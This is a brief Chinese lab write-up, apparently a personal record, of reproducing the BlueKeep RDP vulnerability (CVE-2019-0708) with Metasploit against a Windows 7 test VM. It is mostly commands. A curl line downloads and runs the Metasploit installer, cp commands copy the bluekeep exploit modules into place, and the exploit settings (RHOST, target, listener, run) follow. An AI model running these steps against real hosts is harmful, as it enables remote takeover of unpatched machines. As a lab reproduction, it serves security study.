cve-2019-0708msf复现过程记录

                 利用msf复现cve-2019-0708漏洞

环境搭建：一台windos7旗舰版 vmware虚拟机
一台kali机
首先更新msf版本curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
最新版的是支持使用cve2019-0708的payload的
将下载的msfpayload文件拷贝到对应的目录下
代码如下`

 cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/

`

 cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/

启动MSF控制台重新加载攻击模块

接下来就是设置攻击的参数
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
选定攻击模块
options看一下设置的参数
set RHOST 192.168.80.129（目标机IP）
set target 3(我用的是vmware虚拟机搭的)
可以show targets看一下
设置监听的ip和端口

run就可以了
附上成功的截图